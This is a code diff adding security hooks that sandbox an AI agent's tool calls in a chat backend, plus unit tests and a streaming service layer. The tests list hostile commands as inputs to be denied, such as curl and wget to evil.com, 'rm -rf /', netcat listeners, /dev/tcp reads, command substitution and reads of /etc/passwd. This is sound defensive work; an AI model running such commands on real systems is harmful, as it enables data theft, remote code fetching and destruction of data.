    # Block /dev/ access (e.g., /dev/tcp for network)
    if "/dev/" in command:
        return _deny("Access to /dev/ is not allowed in Bash.")

    # Tokenize with shlex (respects quotes), then extract command names.
    # shlex preserves shell operators like | ; && || as separate tokens.
    try:
        tokens = shlex.split(command)
    except ValueError:
        return _deny("Malformed command (unmatched quotes).")

    # Walk tokens: the first non-assignment token after a pipe/separator is a command.
    expect_command = True
    for token in tokens:
        if token in ("|", "||", "&&", ";"):
            expect_command = True
            continue
        if expect_command:
            # Skip env var assignments (VAR=value)
            if "=" in token and not token.startswith("-"):
                continue
            cmd_name = os.path.basename(token)
            if cmd_name not in ALLOWED_BASH_COMMANDS:
                allowed = ", ".join(sorted(ALLOWED_BASH_COMMANDS))
                logger.warning(f"Blocked Bash command: {cmd_name}")
                return _deny(
                    f"Command '{cmd_name}' is not allowed. "
                    f"Allowed commands: {allowed}"
                )
            expect_command = False

    # Validate absolute file paths stay within workspace
    if sdk_cwd:
        norm_cwd = os.path.normpath(sdk_cwd)
        claude_dir = os.path.normpath(os.path.expanduser("~/.claude/projects"))
        for token in tokens:
            if not token.startswith("/"):
                continue
            resolved = os.path.normpath(token)
            if resolved.startswith(norm_cwd + os.sep) or resolved == norm_cwd:
                continue
            if resolved.startswith(claude_dir + os.sep) and "tool-results" in resolved:
                continue
            logger.warning(f"Blocked Bash path outside workspace: {token}")
            return _deny(
                f"Bash can only access files within the workspace directory. "
                f"Path '{token}' is outside the workspace."
            )

    return {}


def _validate_tool_access(
    tool_name: str, tool_input: dict[str, Any], sdk_cwd: str | None = None
) -> dict[str, Any]:
    """Validate that a tool call is allowed.

    Returns:
        Empty dict to allow, or dict with hookSpecificOutput to deny
    """
    # Block forbidden tools
    if tool_name in BLOCKED_TOOLS:
        logger.warning(f"Blocked tool access attempt: {tool_name}")
        return _deny(
            f"Tool '{tool_name}' is not available. "
            "Use the CoPilot-specific tools instead."
        )

    # Sandboxed Bash: only allowlisted commands, workspace-scoped paths
    if tool_name in SANDBOXED_BASH_TOOLS:
        return _validate_bash_command(tool_input, sdk_cwd)

    # Workspace-scoped tools: allowed only within the SDK workspace directory
    if tool_name in WORKSPACE_SCOPED_TOOLS:
        return _validate_workspace_path(tool_name, tool_input, sdk_cwd)

    # Check for dangerous patterns in tool input
    # Use json.dumps for predictable format (str() produces Python repr)
    input_str = json.dumps(tool_input) if tool_input else ""

    for pattern in DANGEROUS_PATTERNS:
        if re.search(pattern, input_str, re.IGNORECASE):
            logger.warning(
                f"Blocked dangerous pattern in tool input: {pattern} in {tool_name}"
            )
            return _deny("Input contains blocked pattern")

    return {}


def _validate_user_isolation(
    tool_name: str, tool_input: dict[str, Any], user_id: str | None
) -> dict[str, Any]:
    """Validate that tool calls respect user isolation."""
    # For workspace file tools, ensure path doesn't escape
    if "workspace" in tool_name.lower():
        path = tool_input.get("path", "") or tool_input.get("file_path", "")
        if path:
            # Check for path traversal
            if ".." in path or path.startswith("/"):
                logger.warning(
                    f"Blocked path traversal attempt: {path} by user {user_id}"
                )
                return {
                    "hookSpecificOutput": {
                        "hookEventName": "PreToolUse",
                        "permissionDecision": "deny",
                        "permissionDecisionReason": "Path traversal not allowed",
                    }
                }

    return {}


def create_security_hooks(
    user_id: str | None, sdk_cwd: str | None = None
) -> dict[str, Any]:
    """Create the security hooks configuration for Claude Agent SDK.

    Includes security validation and observability hooks:
    - PreToolUse: Security validation before tool execution
    - PostToolUse: Log successful tool executions
    - PostToolUseFailure: Log and handle failed tool executions
    - PreCompact: Log context compaction events (SDK handles compaction automatically)

    Args:
        user_id: Current user ID for isolation validation
        sdk_cwd: SDK working directory for workspace-scoped tool validation

    Returns:
        Hooks configuration dict for ClaudeAgentOptions
    """
    try:
        from claude_agent_sdk import HookMatcher
        from claude_agent_sdk.types import HookContext, HookInput, SyncHookJSONOutput

        async def pre_tool_use_hook(
            input_data: HookInput,
            tool_use_id: str | None,
            context: HookContext,
        ) -> SyncHookJSONOutput:
            """Combined pre-tool-use validation hook."""
            _ = context  # unused but required by signature
            tool_name = cast(str, input_data.get("tool_name", ""))
            tool_input = cast(dict[str, Any], input_data.get("tool_input", {}))

            # Strip MCP prefix for consistent validation
            is_copilot_tool = tool_name.startswith(MCP_TOOL_PREFIX)
            clean_name = tool_name.removeprefix(MCP_TOOL_PREFIX)

            # Only block non-CoPilot tools; our MCP-registered tools
            # (including Read for oversized results) are already sandboxed.
            if not is_copilot_tool:
                result = _validate_tool_access(clean_name, tool_input, sdk_cwd)
                if result:
                    return cast(SyncHookJSONOutput, result)

            # Validate user isolation
            result = _validate_user_isolation(clean_name, tool_input, user_id)
            if result:
                return cast(SyncHookJSONOutput, result)

            logger.debug(f"[SDK] Tool start: {tool_name}, user={user_id}")
            return cast(SyncHookJSONOutput, {})

        async def post_tool_use_hook(
            input_data: HookInput,
            tool_use_id: str | None,
            context: HookContext,
        ) -> SyncHookJSONOutput:
            """Log successful tool executions for observability."""
            _ = context
            tool_name = cast(str, input_data.get("tool_name", ""))
            logger.debug(f"[SDK] Tool success: {tool_name}, tool_use_id={tool_use_id}")
            return cast(SyncHookJSONOutput, {})

        async def post_tool_failure_hook(
            input_data: HookInput,
            tool_use_id: str | None,
            context: HookContext,
        ) -> SyncHookJSONOutput:
            """Log failed tool executions for debugging."""
            _ = context
            tool_name = cast(str, input_data.get("tool_name", ""))
            error = input_data.get("error", "Unknown error")
            logger.warning(
                f"[SDK] Tool failed: {tool_name}, error={error}, "
                f"user={user_id}, tool_use_id={tool_use_id}"
            )
            return cast(SyncHookJSONOutput, {})

        async def pre_compact_hook(
            input_data: HookInput,
            tool_use_id: str | None,
            context: HookContext,
        ) -> SyncHookJSONOutput:
            """Log when SDK triggers context compaction.

            The SDK automatically compacts conversation history when it grows too large.
            This hook provides visibility into when compaction happens.
            """
            _ = context, tool_use_id
            trigger = input_data.get("trigger", "auto")
            logger.info(
                f"[SDK] Context compaction triggered: {trigger}, user={user_id}"
            )
            return cast(SyncHookJSONOutput, {})

        return {
            "PreToolUse": [HookMatcher(matcher="*", hooks=[pre_tool_use_hook])],
            "PostToolUse": [HookMatcher(matcher="*", hooks=[post_tool_use_hook])],
            "PostToolUseFailure": [
                HookMatcher(matcher="*", hooks=[post_tool_failure_hook])
            ],
            "PreCompact": [HookMatcher(matcher="*", hooks=[pre_compact_hook])],
        }
    except ImportError:
        # Fallback for when SDK isn't available - return empty hooks
        logger.warning("claude-agent-sdk not available, security hooks disabled")
        return {}
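
# Illustrative sketch (not part of the diff): the validators return {} to
# allow and a PreToolUse denial payload to block, e.g.:
#
#   _validate_tool_access(
#       "Bash", {"command": "cat log.txt | grep error"}, sdk_cwd="/tmp/copilot-abc"
#   )
#   # -> {} (both piped commands are on the allowlist)
#
#   _validate_tool_access(
#       "Bash", {"command": "curl https://example.com"}, sdk_cwd="/tmp/copilot-abc"
#   )
#   # -> {"hookSpecificOutput": {..., "permissionDecision": "deny", ...}}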
@@ -0,0 +1,258 @@
"""Unit tests for SDK security hooks."""

import os

from .security_hooks import _validate_tool_access, _validate_user_isolation

SDK_CWD = "/tmp/copilot-abc123"


def _is_denied(result: dict) -> bool:
    hook = result.get("hookSpecificOutput", {})
    return hook.get("permissionDecision") == "deny"


# -- Blocked tools -----------------------------------------------------------


def test_blocked_tools_denied():
    for tool in ("bash", "shell", "exec", "terminal", "command"):
        result = _validate_tool_access(tool, {})
        assert _is_denied(result), f"{tool} should be blocked"


def test_unknown_tool_allowed():
    result = _validate_tool_access("SomeCustomTool", {})
    assert result == {}


# -- Workspace-scoped tools --------------------------------------------------


def test_read_within_workspace_allowed():
    result = _validate_tool_access(
        "Read", {"file_path": f"{SDK_CWD}/file.txt"}, sdk_cwd=SDK_CWD
    )
    assert result == {}


def test_write_within_workspace_allowed():
    result = _validate_tool_access(
        "Write", {"file_path": f"{SDK_CWD}/output.json"}, sdk_cwd=SDK_CWD
    )
    assert result == {}


def test_edit_within_workspace_allowed():
    result = _validate_tool_access(
        "Edit", {"file_path": f"{SDK_CWD}/src/main.py"}, sdk_cwd=SDK_CWD
    )
    assert result == {}


def test_glob_within_workspace_allowed():
    result = _validate_tool_access("Glob", {"path": f"{SDK_CWD}/src"}, sdk_cwd=SDK_CWD)
    assert result == {}


def test_grep_within_workspace_allowed():
    result = _validate_tool_access("Grep", {"path": f"{SDK_CWD}/src"}, sdk_cwd=SDK_CWD)
    assert result == {}


def test_read_outside_workspace_denied():
    result = _validate_tool_access(
        "Read", {"file_path": "/etc/passwd"}, sdk_cwd=SDK_CWD
    )
    assert _is_denied(result)


def test_write_outside_workspace_denied():
    result = _validate_tool_access(
        "Write", {"file_path": "/home/user/secrets.txt"}, sdk_cwd=SDK_CWD
    )
    assert _is_denied(result)


def test_traversal_attack_denied():
    result = _validate_tool_access(
        "Read",
        {"file_path": f"{SDK_CWD}/../../etc/passwd"},
        sdk_cwd=SDK_CWD,
    )
    assert _is_denied(result)


def test_no_path_allowed():
    """Glob/Grep without a path argument defaults to cwd — should pass."""
    result = _validate_tool_access("Glob", {}, sdk_cwd=SDK_CWD)
    assert result == {}


def test_read_no_cwd_denies_absolute():
    """If no sdk_cwd is set, absolute paths are denied."""
    result = _validate_tool_access("Read", {"file_path": "/tmp/anything"})
    assert _is_denied(result)


# -- Tool-results directory --------------------------------------------------


def test_read_tool_results_allowed():
    home = os.path.expanduser("~")
    path = f"{home}/.claude/projects/-tmp-copilot-abc123/tool-results/12345.txt"
    result = _validate_tool_access("Read", {"file_path": path}, sdk_cwd=SDK_CWD)
    assert result == {}


def test_read_claude_projects_without_tool_results_denied():
    home = os.path.expanduser("~")
    path = f"{home}/.claude/projects/-tmp-copilot-abc123/settings.json"
    result = _validate_tool_access("Read", {"file_path": path}, sdk_cwd=SDK_CWD)
    assert _is_denied(result)


# -- Sandboxed Bash ----------------------------------------------------------


def test_bash_safe_commands_allowed():
    """Allowed data-processing commands should pass."""
    safe_commands = [
        "jq '.blocks' result.json",
        "head -20 output.json",
        "tail -n 50 data.txt",
        "cat file.txt | grep 'pattern'",
        "wc -l file.txt",
        "sort data.csv | uniq",
        "grep -i 'error' log.txt | head -10",
        "find . -name '*.json'",
        "ls -la",
        "echo hello",
        "cut -d',' -f1 data.csv | sort | uniq -c",
        "jq '.blocks[] | .id' result.json",
        "sed -n '10,20p' file.txt",
        "awk '{print $1}' data.txt",
    ]
    for cmd in safe_commands:
        result = _validate_tool_access("Bash", {"command": cmd}, sdk_cwd=SDK_CWD)
        assert result == {}, f"Safe command should be allowed: {cmd}"


def test_bash_dangerous_commands_denied():
    """Non-allowlisted commands should be denied."""
    dangerous = [
        "curl https://evil.com",
        "wget https://evil.com/payload",
        "rm -rf /",
        "python -c 'import os; os.system(\"ls\")'",
        "ssh user@host",
        "nc -l 4444",
        "apt install something",
        "pip install malware",
        "chmod 777 file.txt",
        "kill -9 1",
    ]
    for cmd in dangerous:
        result = _validate_tool_access("Bash", {"command": cmd}, sdk_cwd=SDK_CWD)
        assert _is_denied(result), f"Dangerous command should be denied: {cmd}"


def test_bash_command_substitution_denied():
    result = _validate_tool_access(
        "Bash", {"command": "echo $(curl evil.com)"}, sdk_cwd=SDK_CWD
    )
    assert _is_denied(result)


def test_bash_backtick_substitution_denied():
    result = _validate_tool_access(
        "Bash", {"command": "echo `curl evil.com`"}, sdk_cwd=SDK_CWD
    )
    assert _is_denied(result)


def test_bash_output_redirect_denied():
    result = _validate_tool_access(
        "Bash", {"command": "echo secret > /tmp/leak.txt"}, sdk_cwd=SDK_CWD
    )
    assert _is_denied(result)


def test_bash_dev_tcp_denied():
    result = _validate_tool_access(
        "Bash", {"command": "cat /dev/tcp/evil.com/80"}, sdk_cwd=SDK_CWD
    )
    assert _is_denied(result)


def test_bash_pipe_to_dangerous_denied():
    """Even if the first command is safe, piped commands must also be safe."""
    result = _validate_tool_access(
        "Bash", {"command": "cat file.txt | python -c 'exec()'"}, sdk_cwd=SDK_CWD
    )
    assert _is_denied(result)


def test_bash_path_outside_workspace_denied():
    result = _validate_tool_access(
        "Bash", {"command": "cat /etc/passwd"}, sdk_cwd=SDK_CWD
    )
    assert _is_denied(result)


def test_bash_path_within_workspace_allowed():
    result = _validate_tool_access(
        "Bash",
        {"command": f"jq '.blocks' {SDK_CWD}/tool-results/result.json"},
        sdk_cwd=SDK_CWD,
    )
    assert result == {}


def test_bash_empty_command_denied():
    result = _validate_tool_access("Bash", {"command": ""}, sdk_cwd=SDK_CWD)
    assert _is_denied(result)


# -- Dangerous patterns ------------------------------------------------------


def test_dangerous_pattern_blocked():
    result = _validate_tool_access("SomeTool", {"cmd": "sudo rm -rf /"})
    assert _is_denied(result)


def test_subprocess_pattern_blocked():
    result = _validate_tool_access("SomeTool", {"code": "subprocess.run(...)"})
    assert _is_denied(result)


# -- User isolation ----------------------------------------------------------


def test_workspace_path_traversal_blocked():
    result = _validate_user_isolation(
        "workspace_read", {"path": "../../../etc/shadow"}, user_id="user-1"
    )
    assert _is_denied(result)


def test_workspace_absolute_path_blocked():
    result = _validate_user_isolation(
        "workspace_read", {"path": "/etc/passwd"}, user_id="user-1"
    )
    assert _is_denied(result)


def test_workspace_normal_path_allowed():
    result = _validate_user_isolation(
        "workspace_read", {"path": "src/main.py"}, user_id="user-1"
    )
    assert result == {}


def test_non_workspace_tool_passes_isolation():
    result = _validate_user_isolation(
        "find_agent", {"query": "email"}, user_id="user-1"
    )
    assert result == {}
@@ -0,0 +1,497 @@
"""Claude Agent SDK service layer for CoPilot chat completions."""

import asyncio
import json
import logging
import os
import re
import uuid
from collections.abc import AsyncGenerator
from typing import Any

from backend.util.exceptions import NotFoundError

from ..config import ChatConfig
from ..model import (
    ChatMessage,
    ChatSession,
    get_chat_session,
    update_session_title,
    upsert_chat_session,
)
from ..response_model import (
    StreamBaseResponse,
    StreamError,
    StreamFinish,
    StreamStart,
    StreamTextDelta,
    StreamToolInputAvailable,
    StreamToolOutputAvailable,
)
from ..service import _build_system_prompt, _generate_session_title
from ..tracking import track_user_message
from .anthropic_fallback import stream_with_anthropic
from .response_adapter import SDKResponseAdapter
from .security_hooks import create_security_hooks
from .tool_adapter import (
    COPILOT_TOOL_NAMES,
    create_copilot_mcp_server,
    set_execution_context,
)
from .tracing import TracedSession, create_tracing_hooks, merge_hooks

logger = logging.getLogger(__name__)
config = ChatConfig()

# Set to hold background tasks to prevent garbage collection
_background_tasks: set[asyncio.Task[Any]] = set()


_SDK_CWD_PREFIX = "/tmp/copilot-"

# Appended to the system prompt to inform the agent about Bash restrictions.
# The SDK already describes each tool (Read, Write, Edit, Glob, Grep, Bash),
# but it doesn't know about our security hooks' command allowlist for Bash.
_SDK_TOOL_SUPPLEMENT = """

## Bash restrictions

The Bash tool is restricted to safe, read-only data-processing commands:
jq, grep, head, tail, cat, wc, sort, uniq, cut, tr, sed, awk, find, ls,
echo, diff, base64, and similar utilities.
Network commands (curl, wget), destructive commands (rm, chmod), and
interpreters (python, node) are NOT available.
"""


def _make_sdk_cwd(session_id: str) -> str:
    """Create a safe, session-specific working directory path.

    Sanitizes session_id, then validates the resulting path stays under /tmp/
    using normpath + startswith (the pattern CodeQL recognises as a sanitizer).
    """
    # Step 1: Sanitize - only allow alphanumeric and hyphens
    safe_id = re.sub(r"[^A-Za-z0-9-]", "", session_id)
    if not safe_id:
        raise ValueError("Session ID is empty after sanitization")

    # Step 2: Construct path with known-safe prefix
    cwd = os.path.normpath(f"{_SDK_CWD_PREFIX}{safe_id}")

    # Step 3: Validate the path is still under our prefix (prevent traversal)
    if not cwd.startswith(_SDK_CWD_PREFIX):
        raise ValueError(f"Session path escaped prefix: {cwd}")

    # Step 4: Additional assertion for defense-in-depth
    assert cwd.startswith("/tmp/copilot-"), f"Path validation failed: {cwd}"

    return cwd
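
# Illustrative sketch (not part of the diff): sanitization strips everything
# except alphanumerics and hyphens before the prefix is applied:
#
#   _make_sdk_cwd("abc-123")        # -> "/tmp/copilot-abc-123"
#   _make_sdk_cwd("../etc/passwd")  # -> "/tmp/copilot-etcpasswd" (traversal chars removed)
#   _make_sdk_cwd("!!!")            # raises ValueError (empty after sanitization)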


def _cleanup_sdk_tool_results(cwd: str) -> None:
    """Remove SDK tool-result files for a specific session working directory.

    The SDK creates tool-result files under ~/.claude/projects/<encoded-cwd>/tool-results/.
    We clean only the specific cwd's results to avoid race conditions between
    concurrent sessions.

    Security: cwd MUST be created by _make_sdk_cwd() which sanitizes session_id.
    """
    import shutil

    # Security check 1: Validate cwd is under the expected prefix
    normalized = os.path.normpath(cwd)
    if not normalized.startswith(_SDK_CWD_PREFIX):
        logger.warning(f"[SDK] Rejecting cleanup for invalid path: {cwd}")
        return

    # Security check 2: Ensure no path traversal in the normalized path
    if ".." in normalized:
        logger.warning(f"[SDK] Rejecting cleanup for traversal attempt: {cwd}")
        return

    # SDK encodes the cwd path by replacing '/' with '-'
    encoded_cwd = normalized.replace("/", "-")

    # Construct the project directory path (known-safe home expansion)
    claude_projects = os.path.expanduser("~/.claude/projects")
    project_dir = os.path.join(claude_projects, encoded_cwd)

    # Security check 3: Validate project_dir is under ~/.claude/projects
    project_dir = os.path.normpath(project_dir)
    if not project_dir.startswith(claude_projects):
        logger.warning(
            f"[SDK] Rejecting cleanup for escaped project path: {project_dir}"
        )
        return

    results_dir = os.path.join(project_dir, "tool-results")
    if os.path.isdir(results_dir):
        for filename in os.listdir(results_dir):
            file_path = os.path.join(results_dir, filename)
            try:
                if os.path.isfile(file_path):
                    os.remove(file_path)
            except OSError:
                pass

    # Also clean up the temp cwd directory itself
    try:
        shutil.rmtree(normalized, ignore_errors=True)
    except OSError:
        pass


async def _compress_conversation_history(
    session: ChatSession,
) -> list[ChatMessage]:
    """Compress prior conversation messages if they exceed the token threshold.

    Uses the shared compress_context() from prompt.py which supports:
    - LLM summarization of old messages (keeps recent ones intact)
    - Progressive content truncation as fallback
    - Middle-out deletion as last resort

    Returns the compressed prior messages (everything except the current message).
    """
    prior = session.messages[:-1]
    if len(prior) < 2:
        return prior

    from backend.util.prompt import compress_context

    # Convert ChatMessages to dicts for compress_context
    messages_dict = []
    for msg in prior:
        msg_dict: dict[str, Any] = {"role": msg.role}
        if msg.content:
            msg_dict["content"] = msg.content
        if msg.tool_calls:
            msg_dict["tool_calls"] = msg.tool_calls
        if msg.tool_call_id:
            msg_dict["tool_call_id"] = msg.tool_call_id
        messages_dict.append(msg_dict)

    try:
        import openai

        async with openai.AsyncOpenAI(
            api_key=config.api_key, base_url=config.base_url, timeout=30.0
        ) as client:
            result = await compress_context(
                messages=messages_dict,
                model=config.model,
                client=client,
            )
    except Exception as e:
        logger.warning(f"[SDK] Context compression with LLM failed: {e}")
        # Fall back to truncation-only (no LLM summarization)
        result = await compress_context(
            messages=messages_dict,
            model=config.model,
            client=None,
        )

    if result.was_compacted:
        logger.info(
            f"[SDK] Context compacted: {result.original_token_count} -> "
            f"{result.token_count} tokens "
            f"({result.messages_summarized} summarized, "
            f"{result.messages_dropped} dropped)"
        )
        # Convert compressed dicts back to ChatMessages
        return [
            ChatMessage(
                role=m["role"],
                content=m.get("content"),
                tool_calls=m.get("tool_calls"),
                tool_call_id=m.get("tool_call_id"),
            )
            for m in result.messages
        ]

    return prior
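
# Illustrative sketch (not part of the diff): the caller passes the full
# session and gets back every message except the one being answered,
# summarized or truncated only when the token threshold was exceeded:
#
#   prior = await _compress_conversation_history(session)
#   context_prefix = _format_conversation_context(prior)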


def _format_conversation_context(messages: list[ChatMessage]) -> str | None:
    """Format conversation messages into a context prefix for the user message.

    Returns a string like:
        <conversation_history>
        User: hello
        You responded: Hi! How can I help?
        </conversation_history>

    Returns None if there are no messages to format.
    """
    if not messages:
        return None

    lines: list[str] = []
    for msg in messages:
        if not msg.content:
            continue
        if msg.role == "user":
            lines.append(f"User: {msg.content}")
        elif msg.role == "assistant":
            lines.append(f"You responded: {msg.content}")
        # Skip tool messages — they're internal details

    if not lines:
        return None

    return "<conversation_history>\n" + "\n".join(lines) + "\n</conversation_history>"
|
||||||
|
|
||||||
|
|
||||||
|
async def stream_chat_completion_sdk(
|
||||||
|
session_id: str,
|
||||||
|
message: str | None = None,
|
||||||
|
tool_call_response: str | None = None, # noqa: ARG001
|
||||||
|
is_user_message: bool = True,
|
||||||
|
user_id: str | None = None,
|
||||||
|
retry_count: int = 0, # noqa: ARG001
|
||||||
|
session: ChatSession | None = None,
|
||||||
|
context: dict[str, str] | None = None, # noqa: ARG001
|
||||||
|
) -> AsyncGenerator[StreamBaseResponse, None]:
|
||||||
|
"""Stream chat completion using Claude Agent SDK.
|
||||||
|
|
||||||
|
Drop-in replacement for stream_chat_completion with improved reliability.
|
||||||
|
"""
|
||||||
|
|
||||||
|
if session is None:
|
||||||
|
session = await get_chat_session(session_id, user_id)
|
||||||
|
|
||||||
|
if not session:
|
||||||
|
raise NotFoundError(
|
||||||
|
f"Session {session_id} not found. Please create a new session first."
|
||||||
|
)
|
||||||
|
|
||||||
|
if message:
|
||||||
|
session.messages.append(
|
||||||
|
ChatMessage(
|
||||||
|
role="user" if is_user_message else "assistant", content=message
|
||||||
|
)
|
||||||
|
)
|
||||||
|
if is_user_message:
|
||||||
|
track_user_message(
|
||||||
|
user_id=user_id, session_id=session_id, message_length=len(message)
|
||||||
|
)
|
||||||
|
|
||||||
|
session = await upsert_chat_session(session)
|
||||||
|
|
||||||
|
# Generate title for new sessions (first user message)
|
||||||
|
if is_user_message and not session.title:
|
||||||
|
user_messages = [m for m in session.messages if m.role == "user"]
|
||||||
|
if len(user_messages) == 1:
|
||||||
|
first_message = user_messages[0].content or message or ""
|
||||||
|
if first_message:
|
||||||
|
task = asyncio.create_task(
|
||||||
|
_update_title_async(session_id, first_message, user_id)
|
||||||
|
)
|
||||||
|
_background_tasks.add(task)
|
||||||
|
task.add_done_callback(_background_tasks.discard)
|
||||||
|
|
||||||
|
# Build system prompt (reuses non-SDK path with Langfuse support)
|
||||||
|
has_history = len(session.messages) > 1
|
||||||
|
system_prompt, _ = await _build_system_prompt(
|
||||||
|
user_id, has_conversation_history=has_history
|
||||||
|
)
|
||||||
|
system_prompt += _SDK_TOOL_SUPPLEMENT
|
||||||
|
message_id = str(uuid.uuid4())
|
||||||
|
text_block_id = str(uuid.uuid4())
|
||||||
|
task_id = str(uuid.uuid4())
|
||||||
|
|
||||||
|
yield StreamStart(messageId=message_id, taskId=task_id)
|
||||||
|
|
||||||
|
stream_completed = False
|
||||||
|
# Use a session-specific temp dir to avoid cleanup race conditions
|
||||||
|
# between concurrent sessions.
|
||||||
|
sdk_cwd = _make_sdk_cwd(session_id)
|
||||||
|
os.makedirs(sdk_cwd, exist_ok=True)
|
||||||
|
|
||||||
|
set_execution_context(user_id, session, None)
|
||||||
|
|
||||||
|
try:
|
||||||
|
try:
|
||||||
|
from claude_agent_sdk import ClaudeAgentOptions, ClaudeSDKClient
|
||||||
|
|
||||||
|
mcp_server = create_copilot_mcp_server()
|
||||||
|
|
||||||
|
# Initialize Langfuse tracing (no-op if not configured)
|
||||||
|
tracer = TracedSession(session_id, user_id, system_prompt)
|
||||||
|
|
||||||
|
# Merge security hooks with optional tracing hooks
|
||||||
|
security_hooks = create_security_hooks(user_id, sdk_cwd=sdk_cwd)
|
||||||
|
tracing_hooks = create_tracing_hooks(tracer)
|
||||||
|
combined_hooks = merge_hooks(security_hooks, tracing_hooks)
|
||||||
|
|
||||||
|
options = ClaudeAgentOptions(
|
||||||
|
system_prompt=system_prompt,
|
||||||
|
mcp_servers={"copilot": mcp_server}, # type: ignore[arg-type]
|
||||||
|
allowed_tools=COPILOT_TOOL_NAMES,
|
||||||
|
hooks=combined_hooks, # type: ignore[arg-type]
|
||||||
|
cwd=sdk_cwd,
|
||||||
|
max_buffer_size=config.sdk_max_buffer_size,
|
||||||
|
)
|
||||||
|
|
||||||
|
adapter = SDKResponseAdapter(message_id=message_id)
|
||||||
|
adapter.set_task_id(task_id)
|
||||||
|
|
||||||
|
async with tracer, ClaudeSDKClient(options=options) as client:
|
||||||
|
current_message = message or ""
|
||||||
|
if not current_message and session.messages:
|
||||||
|
last_user = [m for m in session.messages if m.role == "user"]
|
||||||
|
if last_user:
|
||||||
|
current_message = last_user[-1].content or ""
|
||||||
|
|
||||||
|
if not current_message.strip():
|
||||||
|
yield StreamError(
|
||||||
|
errorText="Message cannot be empty.",
|
||||||
|
code="empty_prompt",
|
||||||
|
)
|
||||||
|
yield StreamFinish()
|
||||||
|
return
|
||||||
|
|
||||||
|
# Build query with conversation history context.
|
||||||
|
# Compress history first to handle long conversations.
|
||||||
|
query_message = current_message
|
||||||
|
if len(session.messages) > 1:
|
||||||
|
compressed = await _compress_conversation_history(session)
|
||||||
|
history_context = _format_conversation_context(compressed)
|
||||||
|
if history_context:
|
||||||
|
query_message = (
|
||||||
|
f"{history_context}\n\n"
|
||||||
|
f"Now, the user says:\n{current_message}"
|
||||||
|
)
|
||||||
|
|
||||||
|
logger.info(
|
||||||
|
f"[SDK] Sending query: {current_message[:80]!r}"
|
||||||
|
f" ({len(session.messages)} msgs in session)"
|
||||||
|
)
|
||||||
|
tracer.log_user_message(current_message)
|
||||||
|
await client.query(query_message, session_id=session_id)
|
||||||
|
|
||||||
|
assistant_response = ChatMessage(role="assistant", content="")
|
||||||
|
accumulated_tool_calls: list[dict[str, Any]] = []
|
||||||
|
has_appended_assistant = False
|
||||||
|
has_tool_results = False
|
||||||
|
|
||||||
|
async for sdk_msg in client.receive_messages():
|
||||||
|
logger.debug(
|
||||||
|
f"[SDK] Received: {type(sdk_msg).__name__} "
|
||||||
|
f"{getattr(sdk_msg, 'subtype', '')}"
|
||||||
|
)
|
||||||
|
tracer.log_sdk_message(sdk_msg)
|
||||||
|
for response in adapter.convert_message(sdk_msg):
|
||||||
|
if isinstance(response, StreamStart):
|
||||||
|
continue
|
||||||
|
yield response
|
||||||
|
|
||||||
|
if isinstance(response, StreamTextDelta):
|
||||||
|
delta = response.delta or ""
|
||||||
|
# After tool results, start a new assistant
|
||||||
|
# message for the post-tool text.
|
||||||
|
if has_tool_results and has_appended_assistant:
|
||||||
|
assistant_response = ChatMessage(
|
||||||
|
role="assistant", content=delta
|
||||||
|
)
|
||||||
|
accumulated_tool_calls = []
|
||||||
|
has_appended_assistant = False
|
||||||
|
has_tool_results = False
|
||||||
|
session.messages.append(assistant_response)
|
||||||
|
has_appended_assistant = True
|
||||||
|
else:
|
||||||
|
assistant_response.content = (
|
||||||
|
assistant_response.content or ""
|
||||||
|
) + delta
|
||||||
|
if not has_appended_assistant:
|
||||||
|
session.messages.append(assistant_response)
|
||||||
|
has_appended_assistant = True
|
||||||
|
|
||||||
|
elif isinstance(response, StreamToolInputAvailable):
|
||||||
|
accumulated_tool_calls.append(
|
||||||
|
{
|
||||||
|
"id": response.toolCallId,
|
||||||
|
"type": "function",
|
||||||
|
"function": {
|
||||||
|
"name": response.toolName,
|
||||||
|
"arguments": json.dumps(response.input or {}),
|
||||||
|
},
|
||||||
|
}
|
||||||
|
)
|
||||||
|
assistant_response.tool_calls = accumulated_tool_calls
|
||||||
|
if not has_appended_assistant:
|
||||||
|
session.messages.append(assistant_response)
|
||||||
|
has_appended_assistant = True
|
||||||
|
|
||||||
|
elif isinstance(response, StreamToolOutputAvailable):
|
||||||
|
session.messages.append(
|
||||||
|
ChatMessage(
|
||||||
|
role="tool",
|
||||||
|
content=(
|
||||||
|
response.output
|
||||||
|
if isinstance(response.output, str)
|
||||||
|
else str(response.output)
|
||||||
|
),
|
||||||
|
tool_call_id=response.toolCallId,
|
||||||
|
)
|
||||||
|
)
|
||||||
|
has_tool_results = True
|
||||||
|
|
||||||
|
elif isinstance(response, StreamFinish):
|
||||||
|
stream_completed = True
|
||||||
|
|
||||||
|
if stream_completed:
|
||||||
|
break
|
||||||
|
|
||||||
|
if (
|
||||||
|
assistant_response.content or assistant_response.tool_calls
|
||||||
|
) and not has_appended_assistant:
|
||||||
|
session.messages.append(assistant_response)
|
||||||
|
|
||||||
|
except ImportError:
|
||||||
|
logger.warning(
|
||||||
|
"[SDK] claude-agent-sdk not available, using Anthropic fallback"
|
||||||
|
)
|
||||||
|
async for response in stream_with_anthropic(
|
||||||
|
session, system_prompt, text_block_id
|
||||||
|
):
|
||||||
|
if isinstance(response, StreamFinish):
|
||||||
|
stream_completed = True
|
||||||
|
yield response
|
||||||
|
|
||||||
|
await upsert_chat_session(session)
|
||||||
|
logger.debug(
|
||||||
|
f"[SDK] Session {session_id} saved with {len(session.messages)} messages"
|
||||||
|
)
|
||||||
|
if not stream_completed:
|
||||||
|
yield StreamFinish()
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"[SDK] Error: {e}", exc_info=True)
|
||||||
|
try:
|
||||||
|
await upsert_chat_session(session)
|
||||||
|
except Exception as save_err:
|
||||||
|
logger.error(f"[SDK] Failed to save session on error: {save_err}")
|
||||||
|
yield StreamError(
|
||||||
|
errorText="An error occurred. Please try again.",
|
||||||
|
code="sdk_error",
|
||||||
|
)
|
||||||
|
yield StreamFinish()
|
||||||
|
finally:
|
||||||
|
_cleanup_sdk_tool_results(sdk_cwd)
|
||||||
|
|
||||||
|
|
||||||
|
async def _update_title_async(
|
||||||
|
session_id: str, message: str, user_id: str | None = None
|
||||||
|
) -> None:
|
||||||
|
"""Background task to update session title."""
|
||||||
|
try:
|
||||||
|
title = await _generate_session_title(
|
||||||
|
message, user_id=user_id, session_id=session_id
|
||||||
|
)
|
||||||
|
if title:
|
||||||
|
await update_session_title(session_id, title)
|
||||||
|
logger.debug(f"[SDK] Generated title for {session_id}: {title}")
|
||||||
|
except Exception as e:
|
||||||
|
logger.warning(f"[SDK] Failed to update session title: {e}")
|
||||||
